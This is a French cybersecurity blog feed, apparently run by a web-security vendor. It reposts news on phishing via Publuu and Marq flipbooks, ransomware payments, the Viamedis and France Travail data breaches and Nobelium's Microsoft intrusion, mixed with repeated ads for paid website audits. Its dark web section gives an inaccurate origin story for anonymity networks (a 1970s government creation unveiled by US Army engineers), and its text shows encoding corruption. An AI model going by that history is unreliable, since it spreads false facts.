Récemment, dans le cadre de tentatives continues de collecte d'informations d'identification et de sessions, les acteurs malveillants ont hébergé des documents de phishing sur des sites de publication de documents numériques légitimes comme Publuu et Marq.
Dans l'affaire Publuu, des e-mails de phishing ayant pour objet « Nouveau document de [fournisseur tiers] » ont Ă©tĂ© envoyĂ©s Ă plusieurs personnes de l'entreprise ciblĂ©e Ă l'aide d'un compte de messagerie compromis appartenant Ă un fournisseur tiers fiable. Le corps de lâe-mail contenait un lien permettant dâouvrir un flipbook Publuu.
« Le document de phishing était un fichier générique largement utilisé, observé lors d'attaques similaires sur d'autres sites DDP.
Cependant, alors que le document de phishing Ă©tait rĂ©utilisĂ©, lâadversaire avait modifiĂ© la page Publuu avec le nom de lâorganisation expĂ©ditrice pour donner de lâauthenticitĂ© au document », ont partagĂ© les chercheurs de Talos avec Cyber Security News.
Le document de phishing
L'utilisateur a été redirigé vers un CAPTCHA Cloudflare aprÚs avoir cliqué sur le lien « AFFICHER LE PDF EN LIGNE ».
L'utilisation du CAPTCHA sert probablement deux objectifs : il protÚge la page de collecte d'informations d'identification de tout accÚs automatisé et présente un véritable site Web aux utilisateurs qui cliquent sur le lien de phishing.
« AprÚs avoir complété le CAPTCHA, la victime est dirigée vers une réplique convaincante d'une page d'authentification Microsoft 365. L'URL de la page contient une longue chaßne alphanumérique, qui peut servir d'identifiant pour le visiteur », ont indiqué les chercheurs.
Les pirates informatiques
Dans le cas de Marq, chaque page a Ă©tĂ© configurĂ©e avec une URL distincte utilisant le domaine de premier niveau, contrairement Ă certains clusters d'activitĂ©s sur d'autres sites DDP. La chaĂźne de requĂȘte URL tkmilric Ă©tait une autre fonctionnalitĂ© partagĂ©e par toutes les URL incorporĂ©es dans le document de phishing.
 hébergeant le document de phishing
Ces fonctionnalitĂ©s indiquent trĂšs probablement une campagne qui utilise le mĂȘme leurre et des domaines personnalisĂ©s ou gĂ©nĂ©rĂ©s par DGA pour collecter des jetons de session pour les composants Microsoft 365.
Atténuations
Bloquez les sites DDP courants via des dispositifs de sécurité aux frontiÚres, la détection et la réponse des points de terminaison (EDR) comme Cisco Secure Endpoint, le filtrage du contenu Web et/ou les contrÎles de sécurité DNS.
Configurez les paramÚtres de sécurité des e-mails pour reconnaßtre et informer les destinataires des liens contenus dans les e-mails contenant des URL communes aux sites DDP.
Utilisez les renseignements sur les menaces pour détecter rapidement les sites Web récemment créés associés à des dangers reconnus.
Soyez attentif Ă tout changement de comportement dans lâenvironnement interne de lâentreprise.
Incluez des informations sur les sites DDP et d'autres techniques d'attaque de phishing hébergées dans le cloud dans la formation de sensibilisation à la sécurité des utilisateurs.
Grùce à la protection contre les logiciels malveillants Perimeter81, vous pouvez bloquer les logiciels malveillants, notamment les chevaux de Troie, les ransomwares, les logiciels espions, les rootkits, les vers et les exploits Zero Day. Tous sont incroyablement dangereux et peuvent faire des ravages sur votre réseau.
Prix d'un Audit de sécurité de site Internet, Exemple de prix de Mises aux Normes de sécurité Web, Prix de d'une réparation suite à des attaques de site Web.
Pour votre comprĂ©hension, quand vous allez chez un garagiste pour votre vĂ©hicule qui est en panne, vous avez besoin de savoir si câest possible de faire les rĂ©parations ? le prix des rĂ©parations ? quand câest possibles de les effectuer ? Avoir des contrĂŽles techniques permanent ou ponctuel, par des Audit de SĂ©curitĂ©? un entretien rĂ©gulier combien ça coute ?
Nous sommes dans les mĂȘmes besoins sauf que les spĂ©cialistes sont plus rares et que leurs niveaux dâĂ©tudes sont beaucoup plus importants.
Parfois, il y a peu de chose Ă rĂ©aliser donc les prix sont moindre, dâoĂč une demande de devis. Si vous effectuez les travaux chez nous, nous prendront en considĂ©ration lâAudit de SĂ©curitĂ© Ă auteur de 50% de sa valeur en dĂ©duction sur votre facture.
Pour d'autres solutions
https://letsgo-web.fr/
0 notes
Comment prévenir contre les attaques de hackers contre les centres hospitaliers en 2024
Les hÎpitaux français cible des hackers Russes
La cybersécurité des centres hospitaliers est d'une importance vitale, étant donné que les systÚmes de santé stockent des informations médicales sensibles et critiques pour la vie des patients. Voici quelques mesures clés pour prévenir les cyberattaques dans les centres hospitaliers :
cyberattaque la meilleure défense c'est:
Sensibilisation et formation du personnel : Former le personnel aux meilleures pratiques en matiÚre de cybersécurité est essentiel. Cela inclut l'identification des tentatives de phishing, l'utilisation sûre des mots de passe, et la reconnaissance des menaces potentielles.
Mises à jour et patchs : S'assurer que tous les systÚmes informatiques, logiciels et dispositifs médicaux sont réguliÚrement mis à jour avec les derniers correctifs de sécurité pour combler les vulnérabilités connues.
Segmentation du réseau : Diviser le réseau informatique en segments distincts et restreindre l'accÚs en fonction des besoins. Cela limite la propagation des attaques en cas de compromission d'un segment.
Surveillance et détection des menaces : Mettre en place des systÚmes de surveillance des réseaux pour détecter les activités suspectes ou les tentatives d'intrusion. L'utilisation de solutions de détection d'intrusion et de gestion des événements de sécurité (SIEM) peut aider à repérer les comportements anormaux.
Cryptage des donnĂ©es : Chiffrer les donnĂ©es sensibles stockĂ©es sur les serveurs, les appareils mĂ©dicaux et les supports de stockage pour empĂȘcher l'accĂšs non autorisĂ©.
Gestion des accĂšs : Mettre en Ćuvre des politiques strictes de gestion des accĂšs pour limiter l'accĂšs aux informations mĂ©dicales uniquement aux personnes autorisĂ©es. Utiliser l'authentification Ă deux facteurs lorsque cela est possible.
Sauvegarde et reprise aprÚs sinistre : Effectuer réguliÚrement des sauvegardes de données et élaborer des plans de reprise aprÚs sinistre pour garantir la disponibilité et l'intégrité des données en cas d'attaque ou de catastrophe.
Partenariat avec des experts en cybersécurité : Collaborer avec des entreprises spécialisées en cybersécurité pour évaluer réguliÚrement les risques, conseiller sur les meilleures pratiques et fournir une réponse rapide en cas d'incident de sécurité.
hackers contre les centres hospitaliers en 2024, ça va ĂȘtre terrible
En appliquant ces mesures de maniÚre proactive, les centres hospitaliers peuvent renforcer leur posture de cybersécurité et protéger efficacement les données médicales sensibles de leurs patients.
Prix d'un Audit de sécurité de site Internet, Exemple de prix de Mises aux Normes de sécurité Web, Prix de d'une réparation suite à des attaques de site Web.
Pour votre comprĂ©hension, quand vous allez chez un garagiste pour votre vĂ©hicule qui est en panne, vous avez besoin de savoir si câest possible de faire les rĂ©parations ? le prix des rĂ©parations ? quand câest possibles de les effectuer ? Avoir des contrĂŽles techniques permanent ou ponctuel, par des Audit de SĂ©curitĂ©? un entretien rĂ©gulier combien ça coute ?
Nous sommes dans les mĂȘmes besoins sauf que les spĂ©cialistes sont plus rares et que leurs niveaux dâĂ©tudes sont beaucoup plus importants.
Parfois, il y a peu de chose Ă rĂ©aliser donc les prix sont moindre, dâoĂč une demande de devis. Si vous effectuez les travaux chez nous, nous prendront en considĂ©ration lâAudit de SĂ©curitĂ© Ă auteur de 50% de sa valeur en dĂ©duction sur votre facture.
Voir pour des développements spécifique
0 notes
CâEST QUOI LE DARK WEB en 2024?
On pourrait dĂ©finir le dark web comme la face sombre dâInternet. Inaccessible par les moteurs de recherche traditionnels comme Google, Bing ou Yahoo et nâutilisant pas non plus un navigateur couramment employĂ© comme Chrome. Contrairement au web visible de tous, le dark web est quant Ă lui constituĂ© de sites, de forums, de marchĂ©s et dâautres services en ligne qui ne sont pas indexĂ©s et qui sont cachĂ©s derriĂšre des rĂ©seaux privĂ©s, des systĂšmes de cryptage et dâautres outils de confidentialitĂ©. Le contenu est accessible via des rĂ©seaux privĂ©s tels que Tor (The Onion Router) ou I2P (Invisible Internet Project), qui permettent lâanonymat de lâutilisateur en cryptant les donnĂ©es de connexion et en masquant lâadresse IP.
Câest pourquoi, il est souvent associĂ© Ă des activitĂ©s illĂ©gales. Il peut ĂȘtre employĂ© pour acheter et vendre des drogues, des armes, des logiciels malveillants, des informations personnelles et dâautres biens illĂ©gaux. Pourtant, Ă lâorigine, le « web cachĂ© » (son autre nom) avait Ă©tĂ© dĂ©veloppĂ© pour un tout autre usage.
CrĂ©Ă© dans les annĂ©es 1970 par le gouvernement amĂ©ricain, son but Ă©tait de permettre Ă ses espions dâĂ©changer en restant anonymes et intraçables. Vingt ans plus tard, les ingĂ©nieurs de lâUS Army en dĂ©voilant ses contours, ont permis au grand public dâen bĂ©nĂ©ficier et donc de lâutiliser. Si aujourdâhui, le dark web permet de lâĂ©change dâinformation par des populations, des journalistes ou des activistes dans des pays oĂč la censure est forte, des dĂ©rives ont rapidement Ă©tĂ© constatĂ©es avec une cybercriminalitĂ© largement dĂ©veloppĂ©e. En raison de son caractĂšre anonyme et de lâabsence de rĂ©glementation, le dark web est considĂ©rĂ© comme un endroit dangereux.
En 2024, le Dark Web désigne toujours la partie non indexée de l'internet accessible via des réseaux anonymes, tels que Tor, I2P ou Freenet. Cette partie de l'internet n'est pas facilement accessible via les navigateurs conventionnels et nécessite souvent des logiciels spécifiques et une connaissance technique pour y accéder.
Le Dark Web continue d'ĂȘtre associĂ© Ă diverses activitĂ©s illicites, telles que la vente de drogues, d'armes, de donnĂ©es volĂ©es, ainsi que des forums et des marchĂ©s pour des activitĂ©s criminelles. Cependant, il est important de noter que le Dark Web n'est pas exclusivement utilisĂ© Ă des fins criminelles. Il est Ă©galement utilisĂ© par des journalistes, des militants des droits de l'homme et d'autres personnes soucieuses de leur vie privĂ©e pour communiquer de maniĂšre sĂ©curisĂ©e et anonyme.
Les autorités et les entreprises de cybersécurité continuent de surveiller le Dark Web pour détecter et prévenir les activités illicites, mais son caractÚre anonyme et décentralisé rend souvent difficile l'application de la loi dans cet environnement. Malgré les efforts pour combattre les activités criminelles sur le Dark Web, il reste un défi constant pour les forces de l'ordre et les défenseurs de la sécurité en ligne.
Audit de sécurité de votre site Internet.
En quoi consiste cette prestation dâanalyses et de conseils de sĂ©curitĂ© de site Internet?
En un rapport complet sur les défaillances possibles de sécurité de votre site Internet.
Suivant lâimportance de votre site Internet le rapport dâAudit de SĂ©curitĂ© fera environ une quinzaine de page avec des explications accessibles pour tous.
Comment ?
Par de multiples analyses et vérifications
Des tests dâattaques
Des contrĂŽles de structures
Et suite à nos investigations, nous vous apportons des conseils pour améliorer votre sécurité de site Internet.
Analyse-de-la-sécurité-web
Audit de la Configuration de SĂ©curitĂ©Â
Test de VulnĂ©rabilitĂ© :Analyse des Certificats SSL/TLSÂ
Gestion des AccĂšs et des IdentitĂ©sÂ
SĂ©curitĂ© des Applications Web (WAF)Â
Protection contre les Injections SQL et XSSÂ
Analyse des Fichiers LogÂ
Gestion des Mises Ă Jour de SĂ©curitĂ©Â
Protection contre les Attaques DDoSÂ
SĂ©curitĂ© des DonnĂ©esÂ
Information Ă la SĂ©curitĂ©Â
0 notes
Cyberattaques-2023, Un montant record de 1,1 Md$ versé en rançons
Les attaques par rançongiciels n'ont pas fini de faire parler d'elles. Et avec elles leurs salves de montants de plus en plus astronomiques : c'est en tout cas ce qui ressort de la derniĂšre enquĂȘte de Chainalaysis sur le sujet qui Ă©value chaque annĂ©e les sommes payĂ©es Ă des pirates par des victimes d'attaques par rançongiciels. AprĂšs un trou d'air en 2022 avec 567 M$, les montants extorquĂ©s dans le cadre de ces campagnes malveillantes sont nettement repartis Ă la hausse, atteignant la somme pharaonique de 1,1 Md$. Soit un niveau jamais vu jusqu'alors Ă comparer aux 983 M$ de 2021, 905 M$ de 2020 et 220 M$ de 2019. « L'annĂ©e 2023 marque un retour en force des ransomwares, avec des paiements records et une augmentation substantielle de la portĂ©e et de la complexitĂ© des attaques - un renversement significatif par rapport Ă la baisse observĂ©e en 2022 », fait savoir Chainanalysis.
AprÚs une année 2022 marquée par le début d'événements géopolitiques majeurs - à commencer par la guerre en Ukraine - la tendance haussiÚre des montants récoltés grùce à des ransomwares est donc repartie de plus belle. Le fournisseur reconnait toutefois que son travail de collecte d'informations relatives aux paiements effectués commence à devenir de plus en plus ardue : « Le paysage des ransomwares est non seulement prolifique mais aussi en constante expansion, ce qui rend difficile le suivi de chaque incident ou la traçabilité de tous les paiements de rançon effectués en crypto-monnaies », avance Chainanalysis.
Cyberattaques fréquences et volumes d'attaques en hausse
Dans son rapport, le fournisseur pointe en 2023 une escalade majeure dans la fréquence, la portée et le volume des attaques menées par une grande variété d'acteurs, allant de grands organismes et réseaux du cybercrime organisé à des cybergangs plus petits mais non moins performants, voire à des individus agissant pour leur propre compte.
Police et justice en embuscade
Parmi les autres indicateurs de l'Ă©tude, on retiendra que les rançons aux montants d'un million de dollars ou ont progressĂ© de façon significative depuis 2021. Alors qu'en juillet 2021 un peu plus de 55 % des rançons demandĂ©es Ă©taient compris dans cette fourchette, elles sont dĂ©sormais plus de 75 % Ă ĂȘtre Ă©gales ou supĂ©rieures Ă 1 M$. « ALPHV-BlackCat est Ă©galement une souche RaaS comme Phobos, mais elle est plus sĂ©lective dans les affiliĂ©s qu'elle autorise Ă utiliser ses logiciels malveillants, recrutant et interrogeant activement les candidats potentiels pour leurs capacitĂ©s de piratage. Cela permet au groupe d'attaquer des cibles plus importantes pour des sommes plus Ă©levĂ©es », explique Chainanalysis.
Letsgo-web.fr l'un des meilleurs fournisseurs du web
Si la situation est grave elle n'est pour autant pas désespérée avec notamment plusieurs gros coups portés aux cybergangs ces derniers mois avec le démantÚlement de plusieurs réseaux malveillants et quelques victoires des autorités judiciaires et des forces de police à signaler. « Le démantÚlement de Hive et la perturbation de BlackCat sont deux excellents exemples de la façon dont le FBI a donné la priorité à l'assistance aux victimes, en aidant les victimes et en imposant des coûts aux mauvais acteurs », fait savoir Chainanalysis.
  à des solutions personnalisé pour votre sécurité de site Internet.
Rapport DâAnalyse, Et De Conseils De La SĂ©curitĂ© De Votre Site Internet
actions de cybersécurité à surveiller
Audit de sécurité de votre site Internet.
[caption id="attachment_6048" align="alignleft" width="858"] Didier Turquet Fondateur[/caption]
En quoi consiste cette prestation dâanalyses et de conseils de sĂ©curitĂ© de site Internet?
En un rapport complet sur les défaillances possibles de sécurité de votre site Internet.
Suivant lâimportance de votre site Internet le rapport dâAudit de SĂ©curitĂ© fera environ une quinzaine de page avec des explications accessibles pour tous.
Comment ?
Par de multiples analyses et vérifications
Des tests dâattaques
Des contrĂŽles de structures
Et suite à nos investigations, nous vous apportons des conseils pour améliorer votre sécurité de site Internet.
Analyse-de-la-sécurité-web, les meilleures actions cybersécurité, la cybersécurité en entreprise
Audit de la Configuration de SĂ©curitĂ©Â
Test de VulnĂ©rabilitĂ© :Analyse des Certificats SSL/TLSÂ
Gestion des AccĂšs et des IdentitĂ©sÂ
SĂ©curitĂ© des Applications Web (WAF)Â
Protection contre les Injections SQL et XSSÂ
Analyse des Fichiers LogÂ
Gestion des Mises Ă Jour de SĂ©curitĂ©Â
Protection contre les Attaques DDoSÂ
SĂ©curitĂ© des DonnĂ©esÂ
Information Ă la SĂ©curitĂ©Â
Plan dâAction en Cas dâIncidentÂ
Rapport est réalisé sous 3 à 5 jours ouvrés.
Pour plus de prĂ©cisions sur ce Rapport dâAnalyse de SĂ©curitĂ©, et de conseils de votre site Internet, regardez en dessous dans le dĂ©tail des descriptions.
0 notes
Cyberattaque de la sécurité sociale
Cyberattaque : cinq questions sur le piratage massif de nos donnĂ©es de santĂ© SociĂ©tĂ©. "Plus de 33 millions" de Français sont concernĂ©s par un vol de donnĂ©es lors dâune cyberattaque menĂ©e contre des gestionnaires du tiers payant, a rĂ©vĂ©lĂ© la Cnil, mercredi 7 fĂ©vrier.
Etat civil, numĂ©ro de sĂ©curitĂ© sociale, informations sur la mutuelle : "plus de 33 millions" de Français sont concernĂ©s par un vol de donnĂ©es lors dâune cyberattaque contre des gestionnaires du tiers payant, a rĂ©vĂ©lĂ© mercredi la Cnil.
Comment ce piratage sâest-il produit ?
Deux sociĂ©tĂ©s servant dâintermĂ©diaires entre les professionnels de santĂ© â mĂ©decins, pharmaciens, opticiens, etc. â et les complĂ©mentaires santĂ© ont Ă©tĂ© la cible dâune attaque : Viamedis (dĂ©tenue notamment par les complĂ©mentaires Malakoff Humanis et VYV) et Almerys. Ce sont les opĂ©rateurs quâun professionnel de santĂ© interroge pour savoir sâil peut accorder ou non le tiers payant Ă un assurĂ© social.
Lâattaque sâest faite par lâusurpation des identifiants et des mots de passe de professionnels de santĂ©. Lâalerte a Ă©tĂ© donnĂ©e le 1á”Êł fĂ©vrier par Viamedis, qui a dĂ©tectĂ© lâattaque, dĂ©connectĂ© sa plateforme de gestion dĂšs la dĂ©couverte de lâintrusion et averti les autres plateformes de tiers payant. Quelques jours plus tard, Almerys a annoncĂ© avoir Ă©galement dĂ©tectĂ© une intrusion. Le directeur gĂ©nĂ©ral de Viamedis, Christophe CandĂ©, a expliquĂ© quâil sâagissait non pas dâune attaque par "rançongiciel", mais dâune intrusion dans la plateforme. "Le compte dâun professionnel de santĂ© a Ă©tĂ© hameçonnĂ©", a-t-il rĂ©vĂ©lĂ©.
Almerys et Viamedis nâont publiĂ© aucune information permettant de comprendre si les attaques avaient simplement pour but de voler des donnĂ©es ou si elles pouvaient viser dâautres objectifs, comme implanter un rançongiciel. Viamedis a par ailleurs dĂ©posĂ© une plainte auprĂšs du procureur de la RĂ©publique. Les autres grandes plateformes de tiers payant ne semblent pas avoir Ă©tĂ© touchĂ©es, selon des informations recueillies par lâAFP auprĂšs notamment de SP SantĂ© (filiale de Cegedim) et dâActil (filiale dâApicil).
Quelles sont les données concernées ?
"Plus de 33 millions de personnes [sont concernĂ©es par une violation de donnĂ©es, qui comprend] pour les assurĂ©s et leur famille : lâĂ©tat civil, la date de naissance et le numĂ©ro de sĂ©curitĂ© sociale, le nom de lâassureur santĂ© ainsi que les garanties du contrat souscrit", a prĂ©cisĂ© dans un communiquĂ© la Cnil.
LIRE AUSSI : Secrets industriels volés, données détruites... L'interminable cauchemar des cyber-défenseurs
Mais, selon le gendarme de la vie privée numérique, "les informations bancaires, les données médicales, les remboursements de santé, les coordonnées postales, les numéros de téléphone, [ou encore les adresses électroniques] ne seraient pas concernés".
Quels sont les risques de cette Cyberattaque de la sécurité sociale?
Selon des spĂ©cialistes de la cybersĂ©curitĂ© interrogĂ©s ces derniers jours par lâAFP, les donnĂ©es exposĂ©es nâont pas une grande valeur en tant que telles, mais peuvent Ă©ventuellement servir Ă de futures cyberattaques. "Ăa ne vaut pas grand-chose, comme donnĂ©es, il faudrait quâil y ait aussi au moins un e-mail et un numĂ©ro de tĂ©lĂ©phone [pour quâelles permettent de monter des attaques rapidement]", assure Damien Bancal, grand observateur du marchĂ© noir de la donnĂ©e volĂ©e et animateur de Zataz.com, un site français dâinformation traitant principalement de la dĂ©linquance informatique.
LIRE AUSSI : Vol de données, attaque incontrÎlable... Les cyber-risques des voitures nouvelle génération
Tamim Couvillers, analyste de la sociĂ©tĂ© de cybersĂ©curitĂ© Vade, confirme que ces donnĂ©es ont peu de valeur marchande, mais avertit quâelles "peuvent vite ĂȘtre croisĂ©es avec dâautres fichiers". Ainsi, souligne-t-il, avoir le numĂ©ro de sĂ©curitĂ© sociale de sa cible "permet de donner de la crĂ©dibilitĂ© Ă un courriel de phishing [hameçonnage]", consistant Ă inciter lâinternaute de cliquer sur un lien malveillant.
"Câest de la donnĂ©e fraĂźche", a Ă©galement commentĂ© lâexpert en cybersĂ©curitĂ© GĂ©rĂŽme Billois, de la sociĂ©tĂ© Wavestone.
Que peuvent faire les personnes concernées ?
Pour savoir si des informations vous concernant, particuliĂšrement votre numĂ©ro de sĂ©curitĂ© sociale, sont potentiellement dans la nature, il est possible de se rendre sur le site Resopharma.fr. Ce site permet de savoir si votre assurance santĂ© est gĂ©rĂ©e par lâun de ces deux prestataires concernant le tiers payant.
La Cnil conseille aux personnes victimes de ce vol de donnĂ©es "dâĂȘtre prudent [es] sur les sollicitations [quâelles peuvent] recevoir, en particulier si elles concernent des remboursements de frais de santĂ©, [mais aussi] de vĂ©rifier pĂ©riodiquement les activitĂ©s et mouvements sur [leurs] diffĂ©rents comptes". "[Il est en effet] possible que les donnĂ©es ayant fait lâobjet de la violation soient couplĂ©es Ă dâautres informations provenant de fuites de donnĂ©es antĂ©rieures".
LIRE AUSSI : Cyberattaques : "Un dossier médical se revend 350 euros sur le dark web"
En outre, en cas de doute, il est conseillĂ© de changer le mot de passe de lâadresse e-mail associĂ©e Ă sa mutuelle et Ă son espace personnel sur Ameli. "Le numĂ©ro de sĂ©curitĂ© sociale est unique. On ne peut pas le changer. En revanche, le mot de passe associĂ© doit aussi ĂȘtre unique. Vous devez le modifier par sĂ©curitĂ©, afin dâĂ©viter que quelquâun ne rentre dans votre compte, que ce soit celui de la mutuelle ou de votre service Ameli", explique Ă TF1 LumĂ©na Duluc, experte en cybersĂ©curitĂ© et directrice du Club de la sĂ©curitĂ© de lâinformation français (Clusif).
Comment prĂ©venir ce genre de piratages Ă lâavenir ?
"Devant lâampleur de la violation", la Cnil a annoncĂ© quâelle allait "mener trĂšs rapidement des investigations", notamment pour vĂ©rifier si les mesures de sĂ©curitĂ© des opĂ©rateurs touchĂ©s par la cyberattaque Ă©taient conformes Ă leurs obligations de protection des donnĂ©es. Elle a aussi appelĂ© les complĂ©mentaires recourant Ă Viamedis et Almerys Ă informer "individuellement et directement" tous leurs assurĂ©s concernĂ©s, prĂ©venant quâelle sâassurera que ce soit fait "dans les plus brefs dĂ©lais".
Audit de Sécurité de site Internet
Comment se préserver des pirates informatique. 100% des sites ont des failles de sécurité.
 Audit de la Configuration de Sécurité
 Analyse de la structuration des dossiers web
 Analyse contre les Attaques DDoS
 Analyse de la Sécurité des Données
 Analyse des Injections SQL et XSS
 Analyse de la Confidentialité des Données
 Analyse des Certificats SSL/TLS
 Analyse de la Conformité aux Normes de Sécurité
 Analyse des Risques Juridiques
 Analyse de l'éligibilité sur les moteurs de recherche
 Plan dâAction en Cas dâIncident
 Conseils des AccÚs et des Identités
 Conseils personnalisés
Commander
Le 1 er Rapport est réalisé sous 3 à 5 jours ouvrés.
0 notes
Une cyberattaque sur France Travail compromet 43 millions de comptes
Le successeur de PÎle Emploi, France Travail, vient d'annoncer avoir été victime d'une cyberattaque accompagnée d'un vol de données. Au total, les informations personnelles de 43 millions de personnes sont potentiellement impactées.
France Travail a été victime d'une cyberattaque entraßnant un vol de données impactant plusieurs millions de données personnelles. (Crédit Photo: DR)
AprĂšs les perturbations sur les services de lâEtat en dĂ©but de semaine, câest une affaire plus importante qui mobilise les experts en cybersĂ©curitĂ©. En effet, France Travail (anciennement PĂŽle Emploi) a publiĂ©Â un communiquĂ©Â prĂ©cisant avoir Ă©tĂ© victime - avec le rĂ©seau Cap Emploi - dâune cyberattaque. Lâorganisme ne donne pas de dĂ©tail sur le type dâattaques, mais elle souligne quâelle sâest accompagnĂ©e dâun vol de donnĂ©es personnelles.
Les enquĂȘtes ont montrĂ© que plusieurs informations confidentielles ont Ă©tĂ©Â compromises : nom et prĂ©nom, date de naissance, numĂ©ro de sĂ©curitĂ© sociale, identifiant France Travail, adresses mail et postale et numĂ©ros de tĂ©lĂ©phone. France Travail prĂ©cise rapidement que les mots de passe et les donnĂ©es bancaires utilisĂ©es pour lâindemnisation ne sont pas concernĂ©s par la cyberattaque.
43 millions de personnes concernées
Plus inquiĂ©tant, le nombre de personnes concernĂ©es par cette violation de donnĂ©es est Ă©norme. La base dĂ©robĂ©e comprend en effet « les donnĂ©es personnelles dâidentification des personnes actuellement inscrites, des personnes prĂ©cĂ©demment inscrites au cours des 20 derniĂšres annĂ©es ainsi que des personnes non inscrites sur la liste des demandeurs d'emploi mais ayant un espace candidat sur francetravail.fr. ». Au total, câest 43 millions de personnes qui sont « potentiellement » concernĂ©es.
France Travail a notifiĂ© lâincident de sĂ©curitĂ© Ă la Cnil et a dĂ©posĂ© plainte. Une enquĂȘte a Ă©tĂ© ouverte par le Parquet de Paris. Par ailleurs, lâorganisme annonce la mise en place dâune plateforme tĂ©lĂ©phonique le 39 49 pour un accompagnement des personnes si besoin.
Communiqué de France Travail
[video width="640" height="360" mp4="https://defender.actions-web.com/wp-content/uploads/2024/03/code-source-video_-_77082-360p.mp4"][/video]
Une cyberattaque sur France Travail
Conformément à nos obligations au titre du RÚglement général sur la protection des données (RGPD), nous avons procédé à une notification auprÚs de la CNIL et avons par ailleurs ce jour déposé plainte auprÚs des autorités judiciaires.
Compte tenu des investigations techniques menĂ©es, les donnĂ©es personnelles dâidentification exposĂ©es sont les suivantes : nom et prĂ©nom, date de naissance, numĂ©ro de sĂ©curitĂ© sociale, identifiant France Travail, adresses mail et postale et numĂ©ros de tĂ©lĂ©phone. Les mots de passe et les coordonnĂ©es bancaires ne sont pas concernĂ©s par cet acte de cybermalveillance. Il nâexiste donc aucun risque sur lâindemnisation.
La base de donnĂ©es qui aurait Ă©tĂ© extraite de façon illicite contient les donnĂ©es personnelles dâidentification des personnes actuellement inscrites, des personnes prĂ©cĂ©demment inscrites au cours des 20 derniĂšres annĂ©es ainsi que des personnes non inscrites sur la liste des demandeurs d'emploi mais ayant un espace candidat sur francetravail.fr. Câest donc potentiellement les donnĂ©es personnelles de 43 millions de personnes qui ont Ă©tĂ© exfiltrĂ©es.
Face à cet acte de cybermalveillance, nous recommandons aux personnes la plus grande vigilance quant aux risques d'hameçonnage (mails ou appels frauduleux) ou de tentatives d'usurpation d'identité. Nous leur rappelons de ne jamais communiquer leur mot de passe ou leurs coordonnées bancaires par téléphone ou par mail: France Travail comme les autres organismes publics ne le demandent jamais.
Une enquĂȘte prĂ©liminaire a Ă©tĂ© ouverte par le Parquet de Paris et confiĂ©e Ă la Brigade de Lutte Contre la CybercriminalitĂ© de la Direction de la Police Judiciaire de Paris qui a mis en place un systĂšme de plainte simplifiĂ©e pour les personnes concernĂ©es accessible Ă lâadresse suivante : https://www.
cybermalveillance.gouv.fr/tous-nos-contenus/actualites/violation-de-donnees-personnelles-france-travail-formulaire-lettre-plainte-202403.
Conscients des consĂ©quences que cela peut engendrer, nous informerons via leur espace personnel ou par mail lâensemble des personnes identifiĂ©es auxquelles nous prĂ©sentons bien Ă©videmment nos excuses. Un dispositif dâinformation dĂ©diĂ© sera Ă©galement disponible dans les prochaines heures via la plateforme tĂ©lĂ©phonique 39 49 afin dâaccompagner tous ceux qui en auraient besoin.
La sĂ©curitĂ© des donnĂ©es confiĂ©es par les demandeurs dâemploi et les entreprises est une prĂ©occupation constante pour nous. Face Ă la menace de cyber attaques qui pĂšse de plus en plus sur les entreprises et organisations au niveau national comme europĂ©en, nous nous devons de renforcer en continu nos dispositifs de protection, procĂ©dures et consignes. Aussi, dĂšs la connaissance avĂ©rĂ©e de cette intrusion, nous avons pris des mesures complĂ©mentaires avec le rĂ©seau Cap emploi pour renforcer nos dispositifs de protection des accĂšs Ă nos applicatifs par nos partenaires.
Trouvez avec nous votre sécurité de site web
0 notes
Le groupe Nobelium a piraté aussi du code source de Microsoft
L'attaque menée par le groupe Nobelium aka Midnight Blizzard sur les messageries de dirigeants de Microsoft a aussi conduit à du vol de certains codes sources. Et ils essayent de les utiliser dans des attaques en cours.
Dans le piratage des comptes de messagerie de dirigeants de Microsoft, le groupe Nobelium a aussi exflitré du code source de certains produits. (Crédit Photo: ThedigitalArtist/Pixabay)
Au dĂ©but de lâannĂ©e 2024, Microsoft avait alertĂ© sur une campagne de cyber-espionnage menĂ©e par un groupe aux multiples noms (Midnight Blizzard, Nobelium, Cozy Bear ou APT29). Cette offensive avait pour but dâaccĂ©der Ă des comptes de messagerie de dirigeants de Microsoft. Aujourdâhui, la firme de Redmond a diffusĂ© une mise Ă jour de son enquĂȘte sur ces faits en soulignant que la campagne avait Ă©galement conduit au vol de certains codes source et que les cybercriminels sâen servaient dans des attaques en cours.
« Ces derniÚres semaines, nous avons constaté que Midnight Blizzard [Nobelium] utilisait des informations initialement exfiltrées de nos systÚmes de messagerie d'entreprise pour obtenir, ou tenter d'obtenir, un accÚs non autorisé », souligne Microsoft dans un billet de blog. « Cela inclut l'accÚs à certains référentiels de code source de l'entreprise et à des systÚmes internes. à ce jour, nous n'avons trouvé aucune preuve que les systÚmes clients hébergés par Microsoft aient été compromis ».
La sociĂ©tĂ© ne donne pas de dĂ©tails sur les codes sources touchĂ©s, mais elle alerte sur le fait que le groupe affiliĂ© Ă la Russie, tente dâutiliser « des secrets de diffĂ©rents types qu'il a trouvĂ©s » pour aller plus loin dans le rĂ©seau de Microsoft et potentiellement de ses clients. « Certains de ces secrets ont Ă©tĂ© partagĂ©s entre des clients et Microsoft dans des courriels, et au fur et Ă mesure que nous les dĂ©couvrons dans nos courriels exfiltrĂ©s, nous avons pris contact avec ces clients pour les aider Ă prendre des mesures d'attĂ©nuation », explique la firme.
0 notes
Piratage des Mac
Si vous pensez que le piratage concerne uniquement les utilisateurs de Windows, alors utilisateurs de Mac, croyez nous, vous n'ĂȘtes pas protĂ©gĂ©s.
Par exemple, en 2017 a eu lieu une campagne d'hameçonnage visant les utilisateurs de Mac, principalement en Europe. TransportĂ© par un cheval de Troie qui avait obtenu un certificat de dĂ©veloppeur Apple valide, l'hameçonnage volait des identifiants en lançant une alerte en plein Ă©cran dĂ©clarant qu'une mise Ă jour essentielle d'OS X Ă©tait en attente d'installation. Si le piratage fonctionnait, les malfaiteurs obtenaient un accĂšs total Ă toutes les communications de la victime, leur permettant d'espionner toute la navigation sur le Web, mĂȘme les connexions HTTPS avec une icĂŽne de verrouillage.
